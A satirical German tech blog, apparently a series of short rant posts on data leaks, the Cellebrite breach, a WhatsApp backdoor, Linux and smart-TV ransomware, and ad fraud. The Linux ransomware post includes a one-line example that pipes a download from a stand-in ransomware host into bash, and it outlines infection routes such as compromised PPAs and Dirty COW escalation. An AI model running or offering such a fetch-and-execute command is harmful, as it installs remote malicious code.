Worauf haben wir denn alle sehnsüchtig gewartet?

Na, ist doch klar: auf die schlechtgeschriebenen kinofilme zu half-life und portal. Erst haben die filmvermarkter damit angefangen, comics zu verfilmen, und jetzt machen sie weiter und verfilmen kompjuterspiele — ist schon scheiße, wenn dem monströsen apparat der industriellen filmprodukzjon nix eigenes mehr einfällt. Am besten eine trilogie aus half-life machen! Und aus portal! So holt man das meiste geld raus! :mrgreen:

Kaum etwas kann den bereits eingetretenen kreativen tod bei den „großen“ kompjuterspielen besser belegen als solche überlegungen. Seltsam: als die technischen möglichkeiten mieser waren, waren die spiele besser.

Meine vorhersage: oskarverdächtig werden die filme nicht.

(Ja, ich habe den doom-film „gesehen“. Es ist ein typischer achtfach-film, also einer, der so langweilig ist, dass man ihn am besten mit achtfachem tempo durchlaufen lässt, um an den paar interessanten stellen auf normaltempo zu gehen. Für etwas, was äktschen sein soll, ist das ziemlich vernichtend.)

Webschopping des tages

Tja, ist schon scheiße, wenn man in einem webschopp eingekauft hat, wo der programmierer gleich eine kleine hintertür zum datenabschnorcheln mit reingemacht hat und wenn diese daten dann für betrügereien aller art missbraucht werden, so dass man noch jahrelang ärger damit haben kann.

„Aber der war doch sicher, da war doch eine schlösschen in der adresszeile des brausers“. :mrgreen:

Ich wünsche euch allen auch weiterhin ganz viel spaß beim festen glauben an den überall leicht und folgenlos versprochenen schutz eurer persönlichen daten. Die liste wäxt und wäxt und wäxt.

Geschäftsmodell der contentindustrie, kurz zusammengefasst

Unterdessen weitet Burda sein Geschäftsmodell aus, mit möglichst billig produzierten Inhalten möglichst große Reichweiten zu erzielen

Ich wünsche euch weiterhin viel spaß mit dem leistungsschutzrechtgeschützten aggregator von focusonlein, einem weiteren garanten für kwalitätsjornalismus, der sich nicht einmal mehr seine fäjhknjuhs selbst ausdenkt oder dschungelkämp-fakten einkauft [ja, echt!], sondern einfach direkt und mutmaßlich mechanisch von der bildzeitung ins CMS übernimmt! Tja, ist schon scheiße, wenn die leute diesen bullschitt genau so teuer bezahlen wollen, wie er es ihnen wert ist und deshalb keine klickergroschen bei der scheißbildzeitung lassen. Lasst eure intelligenz auch weiterhin verachten, damit sich dieses scheißgeschäft der scheißpresse auch weiterhin lohne!

Und freuet euch über den p’litischen bild-dung aus der „vierten gewalt“, die euch täglich eine faustvoll njuhs in die fresse schlägt! In den dunkelkammern des reichstages wird jetzt schon alles dafür vorbereitet, dass die da auch in zukunft ein mit gewalt und zensur durchgesetztes monopol drauf haben.

Datenschleuder des tages

Erstmal zur aufheiterung ein paar weise worte eines weisen p’litikers:

Der bisher gültige Grundsatz, dass Datensparsamkeit das Übermaß der Dinge ist, der hat sich überholt, der muss weg. Datenreichtum muss der Maßstab sein, nach dem wir unsere Politik ausrichten

Alexander Doofrindt, bummsdatenautobahnminister

So, jetzt zum richtigen kram:

Tja, wenn so eine niederträchtige, menschenfeindliche, unterdrückerfreundliche kräcking- und überwachungsklitsche wie „cellebrite“ auf einmal selbst zu den gekräckten und überwachten zählt, denen jemand sportliche neunhundert gigabyte daten abgezogen hat, dann kann mich diese meldung nicht traurig stimmen. 😀

Das ist von der datenmenge her nicht wirklich kleinkram, da dauert die bloße datenübertragung beim abziehen schon ihre zeit. (Deutlich länger als das herunterladen eines HD-filmes.) Offenbar gab es kein monitoring, in dem das aufgefallen ist. Und das bei einer klitsche, die schadsoftwäjhr an staaten verkauft. Na ja, staatliches geld wird ja auch eher selten intelligent ausgegeben.

Übrigens: 900 gigabyte… was zum henker! Selbst eine recht aufgeplusterte datenbank für ein paar milljonen kunden mit jeweils sehr vielen geschäftsvorfällen kommt höchstens auf ein paar hundert megabyte. Und diese klitsche hat ganz sicher keine paar milljonen kunden. Gar nicht auszudenken, wenn die die ganzen von den händis abgezogenen daten da irgendwo auf einen übers internetz zugänglichen rechner gelagert hätten! Schade, dass das Zeug bei der scheißpresse liegt und nicht irgendwo zum freien daunlohd, so dass davon auszugehen ist, dass keine wirklich interessanten einzelheiten bekannt werden.

Hej, ihr ganzen überwachten, habt ihr euch eigentlich schon einmal gefragt, was mit euren ganzen überwachungsdaten passiert? Ach, ihr vertraut? Und denken ist so anstrengend? Na, dann ist ja alles gut! Ihr seid großartige idjoten! Und glaubt schön weiter an den datenschutz, der euch überall versprochen wird! Die liste wäxt und wäxt und wäxt.

Und hej, heise, deine autoren werden auch immer ungenießbarer: erstens hat „cellebrite“ keinen „datenverlust“, die daten sind noch da und wurden „nur“ von jemanden kopiert, und zweitens handelt es sich nicht um häcker, sondern um kräcker. Weia! Werd doch zur kompjuterbild mit schlips, heise onlein!

Freut euch schon alle auf windohs zehn!

Wie für jede Windows-Version verspricht Microsoft auch für Windows 7 eine Support-Dauer von zehn Jahren. Solange stellt Microsoft kostenlos Sicherheitsupdates bereit. Am 14. Januar 2020, also in drei Jahren, endet dieser Zeitraum

Immerhin könnte es sein, dass 2020 der letzte windohs-XP-rechner bei bundesverwaltung, bundeswehr und banken auf windohs sieben umgerüstet wird… :mrgreen:

Welche alternativen zur meikrosoftschen gängel- und überwachungsscheiße es gibt, erfahrt ihr in diesem internetz. Da muss man übrigens keine drei jahre warten, bis man die nutzen kann, das geht schon jetzt. Wer ständig davon redet, dass er dann umsteigt, installiert sich bestimmt bald sein windohs zehn¹, das so gut weggeht, das meikrosoft es mit asozjaler spämm und direkt von der internetz-kriminalität abgeschauter metodik vermarktet hat (und nein, die desktop-spämm von meikrosoft hat für windohs-zehn-nutzer kein ende gefunden). Und nein, es gibt natürlich noch keinen adobe-scheiß für linux oder BSD, aber eine bestehende windohs-sieben-lizenz in einer virtuellen maschine (ohne internetz) zu benutzen, ist ja auch immer noch möglich. Wer musik macht, sollte sich aber schon auf die zusatzlatenz durch die virtualisierung einstellen oder einfach einen rechner haben, der für nix anderes benutzt wird und niemals am netz hängt… 😦

¹Ich schreibe das an einem unbuntu, das ich auch schon längst durch etwas anderes ersetzt haben wollte, aber das bringt mich zum glück nicht nur zum kotzen und lässt mir die freiheit der auswahl meiner bevorzugten benutzerschnittstelle.

Da habt ihr eure krüpplografie von überwachern!

Eine Hintertür in WhatsApp erlaubt es Facebook und anderen, die verschlüsselten Nachrichten der Nutzer nachzulesen, berichtet der Guardian […] Die jetzt entdeckte Backdoor ist nicht Teil des von Oper Whisper Systems implementierten Signal-Protokolls. Sie erlaubt es Facebook jedoch, neue Schlüssel zu erzeugen, ohne dass der Nutzer dies merkt – und so die Kommunikation mitzulesen

Wenn euch doch nur jemand vorm scheißfratzenbuch gewarnt hätte! Idjoten! Wenns internetz im händi ist, ists gehirn im arsch.

Nachtrag: wisst ihr noch, wie heise onlein vor einem dreiviertel jahr ganz unkritsch und im besten schleichwerbeton reklame für die überwachungssoftwäjhr whatsapp vom spämmenden und träckenden fratzenbuch gemacht hat? Tja, geld stinkt eben nicht. Und damit ihr diese offensichtliche schleichwerbung nicht etwa für ein versehen haltet, hat heise onlein — ich wüsste ja gern mal, wie viel geld vom fratzenbuch die für ihre vorsätzliche desinformazjon kriegen — heute so geschrieben, als handele es sich um einen programmierfehler, wie er halt überall mal passieren kann, statt die dinge deutlich beim namen zu nenen, wenn dieser fehler an whatsapp gemeldet wird und einfach drinbleibt. Es gibt nämlich nur einen einzigen denkbaren grund, warum man einen „fehler“ drinlassen sollte, der eine hintertür zur aufhebung der verschlüsselung ist, und der ist nun einmal, dass die hintertür für gut gehalten wird und mutmaßlich mit absicht eingebaut wurde. Wenn ihr wert auf eure privatsfäre und eure kompjutersicherheit legt, seid ihr bei den schleichwerbenden kwalitätsjornalisten aus der karl-wiechert-allee schlecht beraten. Das solltet ihr euch merken, um künftige empfehlungen dieser immer wieder einmal vorsätzlich leserverdummenden kommerzjellen webseit (beispiel eins, beispiel zwei) beurteilen zu können.

Ob herr Erdoğan und herr Putin wohl auch zugriff auf die vom fratzenbuch eingesammelten daten nehmen können? Ob sich das fratzenbuch diese „märkte“ wohl entgehen lassen würde? Heise, ihr arschlöcher, ihr bringt mit eurer schleichwerbung in form von gezielter desinformazjon im redakzjonellen teil menschen ins gulag oder in einen folterknast. Nur für eine handvoll judasgeld. Widerlich! Erzählt mir nie, nie, nie wieder etwas über werte und verantwortung des jornalismus!

Hej, neuland-schopper!

Passt immer schön auf, wo ihr eure bankdaten, eure anschrift oder eure mäjhladresse eingebt! Wenn ihr sie in einen webschopp eingebt, könnten sie hinterher bei verbrechern liegen, die damit dinge machen, die ihr nicht wollen werdet.

Und wenn ihr idjoten da draußen immer noch an den datenschutz glaubt: Achtet mal darauf, dass es in der BRD keinerlei konsekwenz für den betreiber einer webseit hat, wenn er sie trotz warnung durch das BSI monatelang in unsicherer form weiterbetreibt. Ist ja nur ein schopp, über den käufe und zahlungen abgewickelt werden, und sind nicht diese gefährlichen fäjkenjuhs, die man mit allen mitteln bekämpfen muss…

Die liste wäxt und wäxt und wäxt. Und immer noch glauben idjoten an den schutz ihrer daten.

Was in russland anders ist als hier

In russland ist das geschäftsmodell einer nach vergorenen exkrementen stinkenden spämmsau wie linkedin schlicht illegal und wird deshalb mit staatsgewalt unmöglich gemacht. Recht so. Wer mit händy-trojanern adressbücher von wischofonen abgreift und eingesammelte adressen zuspämmt, sollte eigentlich in den knast gehen (ausspähen von daten, arglistige täuschung und alles, was dem staatsanvergewalt noch so einfällt). Von solchen zuständen kann man hier nur träumen.

Oh, geht nicht, weil die knäste voller schwarzfahrer sind? schade.

Ich hoffe, dass ich noch die zeit erlebe, in der die kooperazjon mit einem spämmer bedeutet, dass man keine karrjere jenseits gebäudereinung, bauhelfer oder aldi-kasse mehr machen kann! Ihr scheißidjoten, die ihr bei linkedin mitmacht, ihr seid die spämm!

Was habe ich darauf gewartet!

Unter linux gibt es kein ausreichenden softwäjhr-angebot? Das ändert sich. ENDLICH gibt es erpressungstrojaner auch für linux-sörver!!!1!elf!!

Bleibt nur eine offene frage: das ding braucht offensichtlich root-rechte, um sich über GRUB melden zu können. Wie kann man einem linux-sörver einen trojaner unterjubeln. Ich sehe da (bei debianoiden systemen) folgende möglichkeiten:

  • PPAs wurden gepwnt. Der admin ist eine schlafmütze und hat PPAs auf einem sörver eingetragen, die dann halbautomatisch sein system mitwarten. (Die alternative ist es, kwelltextpakete nach abgleich der prüfsumme selbst zu kompilieren.) Das bildschirmfoto zeigt einen unbuntu-GRUB, deshalb scheint mir ein PPA gar nicht unwahrscheinlich zu sein.
  • Fiese debian-fehler, die bei der unnötigen umstellung des paketmänätschments aufgetreten sind, wurden ausgebeutet.
  • Über irgendeine kombinazjon verschiedener „kleiner“ fehler, die ein admin aus furcht vor problemen auch mal völlig ungefixt lässt, kam es zur rechteausweitung und zur ausführung von kohd mit root-rechten. Etwa, wenn es durch einen fehler in websörver oder in einer darauf laufenden anwendung möglich geworden ist, kohd mit den rechten des websörvers auszuführen, um dann dirty COW zu benutzen, um root zu kriegen.

Wie es auch sei, eines wirkt dumm an diesem trojaner: warum handelt es sich um die linux-variante eines windohs-schädlings. Gerade ein un*xoides betrübssystem macht es im grunde sehr einfach, einen derartigen trojaner zu schreiben. Sogar die implementazjon in einem shellskript wäre bekwem möglich. Kurz: die leute, die das gemacht haben, sind vermutlich ein bisschen dumm. Dabei braucht nicht einmal eine temporäre datei (die bei einer analyse den privaten schlüssel verraten und eine entschlüsselung ermöglichen könnte) auf einem datenträger abgelegt zu werden, es gibt doch pipes:

# curl -L http://get.ransomware.example.com/?for=some_id | bash

Un*xoide betrübssysteme haben eben ihre ganz eigene eleganz… :mrgreen:

Aber: welche schlafmütze von admin hat keine bäckups vom sörver? Oh… 😦

Aber die jagd ist eröffnet. Inzwischen haben ja doch so einige ganz normale anwender ein linux-system als desktoprechner, und viele von ihnen dürften sich sehr sicher fühlen, weil sie ja nicht dieses gefährliche windohs benutzen und deshalb alle vorsicht fahren lassen… da wird die überraschung dann böse, wenn beim hochfahren auf dem bildschirm „gib mir bitcoin, oder du siehst deine daten nie wieder“ steht.

Lasst euch kein antivirus-schlangenöl für linux aufschwatzen! Die scheiße funkzjoniert schon unter windohs nicht und reißt tendenzjell eher noch größere sicherheitslöcher auf. Lernt lieber etwas über den kompjuter, den ihr benutzt, klickt nicht auf alles, was sich anklicken lässt und seht zu, dass ihr immer ein aktuelles system habt. Die beste antivirus-softwäjhr ist das gehirn.

Telekomiker des tages

Sagt der scheff: „Weia, ist uns da eine große scheiße passiert. Wir haben 200.000 SIM-karten an einen toten obdachlosen verkauft, und jetzt hat sich rausgestellt, dass es terroristen waren“. Sagt der PR-lügner: „Moment, ich habe eine idee. Ich rotze einfach eine PResseerklärung raus, die so tut, als seien wir für die terrorbekämpfung zuständig und verliere kein wort darüber, dass das niemanden bei uns jemals aufgefallen ist“.

Und in der tat, die jornallje (einschließlich heise onlein) bringt die PResseerklärung und stellt keine doofen fragen an einen wichtigen anzeigenkunden… 😦

Security-bullschitt des tages

Symantec, bei vielen besser unter der von synmantec völlig kaputtgemachten marke „norton“ bekannt und berüchtigt, hat eine tolle neue idee, wie man das mit der kompjutersicherheit im internetz der dinge machen kann: mit einem tollen extrasicheren router, der jede verdammte DNS-abfrage erstmal nach hause funkt, um sie dort zu überprüfen. Kann man natürlich abstellen, aber dann ist das dingens nicht mehr so extrasicher. Und ein toller kompjutersicherheitsdienst von symantec, der zehn dollar im monat kostet (in der BRD werden daraus mindestens zwölf øre, denn die bewohner der BRD sind doof und zahlen noch mehr). Und damit die tolle routerkugel noch extrasicherer wird, kann man die bekwem mit seinem wischofon administrieren, denn alles, was auf einem wischofon läuft, ist ja extrasicher.

Bemerkenswert und ein guter fnord ist auch das dießein der netzwerkenteignungs- und überwachungswanze aus den vereinigten staaten eines teils von nordamerika, das sich nahtlos in das dießein größerer US-überwachungsanlangen einbettet.

Kurz: eine rundum gelungene lösung für leute mit zu viel geld und zu wenig hirn. Alle anderen wissen aber auch schon, wie man das internetz der dinge sicher kriegen kann: durch verzicht auf den ganzen sinnlosen techniktinnef, der allerlei lösungen ohne bestehendes problem anbietet. Aber da die welt ja reif ist und gepflückt werden muss, werden die leute sogar zwitschernde klopapierabroller kaufen, die rechtzeitig neue bratzpappe bei irgendwelchen halunken mit webseit einkaufen. Das ist doch toll, wenn sich das geld wie von allein ausgibt. Und wenn man dann (zusammen mit dem rest der gelangweilten welt) beim zwitscherchen nachlesen kann, dass man 2016 im durchschnitt pro sitzung 14,6 blatt klopapier verbraucht hat, für eine defäkazjon im schnitt 3:15,19 sekunden benötigt hat und nur drei tage im jahr dünnschiss, aber wesentlich häufiger verstopfung hatte, dann hat sich das internetz der dinge doch in jeder erdenklichen weise gelohnt. Schade nur, dass die klospülung jetzt dauernd läuft, die wohnung auf 35°C geheizt wird und der klopapierabroller fünftausend dildos bestellt hat, weil sich der nachbarsjunge ein bisschen gelangweilt hat, dieser idjot… oh, warum fährt jetzt das auto auf einmal von alleine weg… :mrgreen:

Tja, wenn euch doch nur jemand gewarnt hätte, ihr idjoten!

Russische häcker des tages

Habt ihr ja alle mitgekriegt, dass die pösen russischen häcker einen cyber-cyber-angriff auf die stromversorgung der hl. vereinigten staaten eine teils von nordamerika versucht haben. Tja, das waren gar nicht die russen:

Wie die Zeitung nun erklärt, wurde der Alarm ausgelöst, als ein Mitarbeiter des Burlington Electric Departments seinen E-Mail-Account bei Yahoo geöffnet habe. Das sei im System als Zugriff auf eine verdächtige IP-Adresse gewertet worden, die in Verbindung mit dem mutmaßlichen russischen Hackerangriff auf die Demokratische Partei stehe

Bwahahahaha!

Wenn so etwas vorm WM-endspiel käme!

Ihr wolltet „smarte“ glotzen?

Erpresser-Botschaft in Dauerschleife:
Smart TV von LG mit Ransomware infiziert

Bwahahahaha!

Wenn euch doch nur jemand vor der ganzen smartscheiße gewarnt hätte, nicht wahr? Auch weiterhin viel spaß mit euren ganzen smartdingern, ihr dumbasses!

Hej, eure autos werden demnächst auch alle noch viel „smarter“. Ich würde da den trojaner ja so machen, dass man das auto erst dann wieder abschließen kann, wenn man bezahlt hat. Aber ich bin ja auch kein richtiger verbrecher, der zynisch und menschenverachtend ist und dem es scheißegal ist, wie viele leute bei seinen nötigungen verrecken, solange er nur selbst seinen schnitt macht. „Wenn sie wieder die gewohnte bremswirkung haben möchten, zahlen sie jetzt ganz bekwem drei bitcoin, einfach hier hintäppen und schritt für schritt durch die zahlung führen lassen, während sie weiter auf der autobahn unterwegs sind. Eine reduzierung ihrer fahrgeschwindigkeit wird nach eingang der zahlung sofort wieder möglich sein“… :mrgreen:

Und wer glaubt, dass im falle eines falles ein guter alter reset hilft…

Ein Zurücksetzen des TV-Gerätes mit öffentlich dokumentierten Methoden soll das Problem nicht gelöst haben

…hat sich auch geschnitten. Zum ausgleich ist das in smartglotzen für dumbasses verbaute ändräut oft schon bei auslieferung so übel veraltet, dass man sich über ausgebeutete sicherheitslöcher nicht zu wundern braucht. Ich würde mich jedenfalls nicht darauf verlassen, dass man dafür immer erst eine äpp installieren muss.

S/M und fäjhknjuhs des tages

Wisst ihr noch, damals, als wir aus der ferne auf staaten geblickt haben, die vor einer wahl fratzenbuch und zwitscherchen zensiert haben? Das könnt ihr euch demnächst vielleicht auch mal aus der nähe anschauen:

Bei der automatisierten Verbreitung von Meinungen im Netz sieht Schönbohm auch die Netzwerke in der Pflicht. „Wenn diese von sich aus die Maschinen-gesteuerten Meinungsäußerungen herausfiltern würden, dann wäre dies ein wesentlicher Beitrag zur Lösung des Problems.“

Nein, der cyberclown meint nicht die ebenfalls automatisch und maschinengesteuert befüllten ticker der kwalitätsjornalistischen kwalitätsmedien von bildzeitung bis ZDF.

Übrigens, liebe heise-jornalisten…

Übrigens, liebe heise-jornalisten, ihr habt doch hoffentlich verständnis dafür, dass ich es mir das nicht antue, wenn ihr mir statt eines artikels ein video andrehen wollt, in dem ich ein paar minuten lang einen sprechenden kopf sehen kann, der mir — begleitet von wenig aussagekräftigen und weitgehend erwartungsgemäßen bildern — den artikel vom teleprompter vorliest. Beim lesen kann ich nämlich das unwichtige und nicht-interessierende einfach überfliegen. Ich nehme an, ihr, liebe heise-jornalisten aus der karl-wiechert-allee, ihr bevorzugt auch festplatten oder SSDs vor magnetbandspeichern. Warum bevorzugt ihr die? Klar, weil ein wahlfreier zugriff erhebliche vorteile gegenüber einen sekwenzjellen zugriff hat. Und genau darin besteht für einen alfabetisierten menschlichen leser auch der unterschied zwischen einem text und einem videofilmchen…

Ach, die bedürfnisse eurer leser interessieren euch gar nicht? Ihr macht das nur, um ihnen die reklame unterzujubeln, die viele im text nicht mehr sehen? Und um sie zu gängeln, dass sie sicherheitseinstellungen ihres webbrausers lockern und javascript für euch aktivieren müssen? Na, dann geht mal gepflegt verrecken, wenn euch eure leser nicht interessieren! Idjoten! Hirnstummel! Jornalisten!!1!

Webreklame des tages

Hej, scheißwerber, was ist die von dir bezahlte „sichtbarkeit“ deiner webverseuchung mit reklame wert? Und wer klickt überhaupt auf deine scheißreklame? Wenn ein paar schlaue halunken täglich fünf sportliche milljonen dollar mit im grunde simplen klickbetrug auf webreklame machen können, ohne dass das im normalen betrieb (also ohne spezjelle untersuchung) auffällt, dann ist sie wohl nicht halb so wertvoll, wie du scheißwerber es deinen kunden mit lustigen statistiken vorlügst. Und ich gehe davon aus, dass es sich bei der aufgedeckten bande um die spitze eines eisberges handelt. Mir kommt ja ganz spontan in den sinn, dass man botnetze (zum beispiel mit übernommenen geräten aus dem „internetz der dinge“) für diesen zweck nutzen kann, ohne dass es beim muster der IP-adresse irgendeine auffälligkeit gibt.

Anfang dieses jahres habe ich mich verstiegen, vorauszusagen, dass es nur noch zwei jahre bis zum ende der reklame im web sind. Spürst du, wie die einschläge näherkommen, scheißwerber?! Oder hast du mal wieder zu viel koks in deiner nase und kannst deshalb nichts anderes als deine eigene WICHTIGKEIT spüren, du wicht?!

Jenen, die immer noch so naiv sind, dass sie ihr geld für reklame im web ausgeben: was die wirksamkeit betrifft, könntet ihr euer geld auch verbrennen. Überprüft doch mal schnell, ob es auch nur die kosten für diese reklameform wieder reinbringt! Ihr habt die logdateien euer websörver und könnt genau nachvollziehen, welche klicks auf webreklame zu umsatz geführt haben und wie viele euch nur kosten gemacht haben. Und wieviel profit ihr von diesem umsatz habt, kann euch euer kontrohling ausrechnen. (Ja, anders als bei plakaten und zeitungsanzeigen ist euch eine direkte und genau kwantifizierbare erfolgskontrolle möglich! Wenn ihr das nicht macht, seid ihr ziemlich hirnlos. Und wenn ihr das dem reklamelügner überlasst — ja, werber sind gewerbsmäßige lügner — und euch von so einem typen irgendwelche, mit bullschitt-diagrammen und nichtssagenden blendwörtern aufgeblähte lügenberichte voller erfolg andrehen lasst, seid ihr möglicherweise opfer eines gar nicht so seltenen beschisses, und deshalb prüft man so etwas nach und sucht sich gegebenenfalls einen weniger zwielichtigen werbepartner.) Irgendein aufgewecktes kind, das ein bisschen perl kann, werdet ihr schon finden, wenn ihr selbst zu informatikanalfabetisch dafür seid.

Geh endlich sterben, reklameheini! Kannst dir ja einen schönen claim auf deinen grabstein meißeln lassen, so etwas wie „bewusst, gesund, modern, natur und leben“, du arschloch. So machst du deiner mutter wenigstens noch eine kleine freude… :mrgreen:

Die gute nachricht des tages

Nochmal ganz langsam zum Mitschreiben für den einen oder anderen europäischenn [sic!] Gesetzgeber erklären Europas höchste Richter: Eine anlasslose Vorratsdatenspeicherung ist grundrechtswidrig

Und noch einmal ganz langsam zum mitschreiben für die menschen aus der BRD: das bedeutet, dass die totalüberwachungsideen unserer innenp’litiker aus CDU, CSU und SPD grundrechtswidrig sind. Das hätte zwar auch prof. dr. Offensichtlich mitbekommen, aber was interessiert das einen p’litiker, der auf die menschen und ihre menschenrechte scheißt? Dass, was jahrzehntelang recht war, werte p’litiker, ist hier noch einmal bestätigt worden, weil ihr eine staatskriminelle bande seid, die vor keinem rechtsbruch zurückschreckt.

Aber hej, keine sorge und nicht zuviel freude wegen einer guten nachricht: wenn die euch verachtenden scheißp’litiker euch nicht legal totalüberwachen dürfen, werden sie euch eben illegal totalüberwachen, im zweifelsfall durch geheimdienstliche zusammenarbeit mit anderen staaten, die dann die überwachung durchführen und daten austauschen, so wie BND und NSA es jahrelang gehandhabt haben. Oder eben nach französischer metode, mit einem ausnahmegesetz zur abwehr akuter terroristischer gefahren, das einfach ein paar jahrzehnte lang gültig gelassen wird und die verfassung teilweise außer kraft setzt.